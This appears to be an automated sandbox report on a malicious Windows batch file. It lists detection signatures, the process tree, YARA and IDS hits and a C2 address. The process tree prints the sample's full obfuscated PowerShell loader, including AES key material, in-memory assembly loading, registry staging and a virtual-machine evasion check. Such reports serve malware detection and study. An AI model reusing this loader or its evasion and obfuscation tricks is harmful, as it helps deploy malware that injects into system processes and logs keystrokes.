Windows Analysis Report
uy2g7z.bat

Overview

General Information

Sample name: uy2g7z.bat
Analysis ID: 1637038
MD5: 8c978ee76d617722aa91e4541333aed8
SHA1: 3f5b77c057ef8b64aa0da7e9a6af7508eb76605a
SHA256: 973a40fc27269affe13538285a98317ccdbc0846d234cc7d480621bf3944cd2e
Tags: 45-94-31-176, bat, user-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell decrypt and execute
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 8328 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8380 cmdline: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8560 cmdline: powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • findstr.exe (PID: 8680 cmdline: "C:\Windows\system32\findstr.exe" /i WDS100T2B0A MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 8740 cmdline: cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, 
Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWMMyKQFoeskiSq' -Value $lYat; Set-ItemProperty -Path $registryPath -Name 'mNFaDYQRq' -Value 'eXAIQpHXCISAurBcL+cB4j6Wl4frmb7/6hBgrJH2cKI='; Set-ItemProperty -Path $registryPath -Name 'OvWrknEdQ' -Value 'LyW7oceGo36XZlqrEE5xlQ==';}$sjrS = 'C:\Users\user\Desktop\uy2g7z.bat';$host.UI.RawUI.WindowTitle = $sjrS;$ZyQM=[System.IO.File]::ReadAllText($sjrS).Split([Environment]::NewLine);foreach ($mcTi in $ZyQM) { if ($mcTi.StartsWith('tPpko')) { $eEXA=$mcTi.Substring(5); break; }}ZAB $eEXA;$lYat=[string[]]$eEXA.Split('\');Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$FAf = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[0].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$thN = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[1].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');Invoke-Expression -Verbose '$RKq = ppFM (cuoF 
(7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[2].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');QIGO $FAf $null;QIGO $thN $null;QIGO $RKq (,[string[]] ('wjzJMHoFZaIaceAGUG')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8748 cmdline: powershell.exe -WindowStyle Hidden -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
          • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
            • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
            • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
            • svchost.exe (PID: 404 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 656 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 900 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1028 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1204 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1232 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1372 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1452 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1472 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1692 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1716 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1736 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1788 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1880 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1964 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1972 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1304 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2132 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 2176 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
            • svchost.exe (PID: 2292 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2396 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2408 cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2508 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • more.com (PID: 8772 cmdline: more MD5: EDB3046610020EE614B5B81B0439895E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
    Process Memory Space: powershell.exe PID: 8748 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    • 0x3d37b:$b2: ::FromBase64String(
    • 0x3db35:$b2: ::FromBase64String(
    • 0x3dbe8:$b2: ::FromBase64String(
    • 0x3fab1:$b2: ::FromBase64String(
    • 0x8d7e8:$s1: -join
    • 0x1c6be3:$s1: -join
    • 0x1c879b:$s1: -join
    • 0x924dc:$s3: Reverse
    • 0x1ba50d:$s3: Reverse
    • 0x8824d:$s4: +=
    • 0x882ef:$s4: +=
    • 0x8ba07:$s4: +=
    • 0x8d4bd:$s4: +=
    • 0x8d6d3:$s4: +=
    • 0x8d7ca:$s4: +=
    • 0x1c25cf:$s4: +=
    • 0x1c25ee:$s4: +=
    • 0x1c2629:$s4: +=
    • 0x1c2646:$s4: +=
    • 0x1c2681:$s4: +=
    • 0x1c26ed:$s4: +=
    Process Memory Space: winlogon.exe PID: 556 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
      Source | Rule | Description | Author | Strings
      amsi64_8748.amsi.csv | JoeSecurity_PowershellDecryptAndExecute | Yara detected Powershell decrypt and execute | Joe Security

        System Summary

        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: winlogon.exe, ParentImage: C:\Windows\System32\winlogon.exe, ParentProcessId: 556, ParentProcessName: winlogon.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 932, ProcessName: svchost.exe
        Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" , CommandLine: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8328, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" , ProcessId: 8380, ProcessName: powershell.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2025-03-13T10:26:07.671914+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 45.94.31.176 | 4782 | 192.168.2.5 | 49713 | TCP

        AV Detection

        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
        Source: unknown | HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.5:49714 version: TLS 1.2
        Source: Binary string: kernel32.pdbUGP source: winlogon.exe, 0000000D.00000003.1776106983.0000022FCEF6F000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\acrobat_sbx.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831535~1. source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorU source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdbUGP source: winlogon.exe, 0000000D.00000003.1571314943.0000022FD0980000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ~1.PDB source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdbUGP source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdb source: winlogon.exe, 0000000D.00000003.1571314943.0000022FD0980000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernel32.pdb source: winlogon.exe, 0000000D.00000003.1776106983.0000022FCEF6F000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831Cl source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdb source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA0F264 FindFirstFileExW,3_2_000001D54FA0F264
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA0F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_000001D54FA0F3E8
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00000281B7BCF3E8
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BCF264 FindFirstFileExW,4_2_00000281B7BCF264
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D19F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_000001F66D19F3E8
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D19F264 FindFirstFileExW,9_2_000001F66D19F264
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB937F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_0000019AB937F3E8
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB937F264 FindFirstFileExW,14_2_0000019AB937F264
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDAF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001A53EDAF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDAF264 FindFirstFileExW,15_2_000001A53EDAF264
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4CF264 FindFirstFileExW,17_2_0000027D8F4CF264
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_0000027D8F4CF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000001AD09EAF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000001AD09EAF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000001AD09EAF264 FindFirstFileExW,18_2_000001AD09EAF264
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_0000020EC013F264 FindFirstFileExW,19_2_0000020EC013F264
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_0000020EC013F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000020EC013F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 20_2_00000229EA6AF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00000229EA6AF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 20_2_00000229EA6AF264 FindFirstFileExW,20_2_00000229EA6AF264
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001777BDCF264 FindFirstFileExW,21_2_000001777BDCF264
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001777BDCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001777BDCF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000001590E6BF264 FindFirstFileExW,22_2_000001590E6BF264
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000001590E6BF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001590E6BF3E8
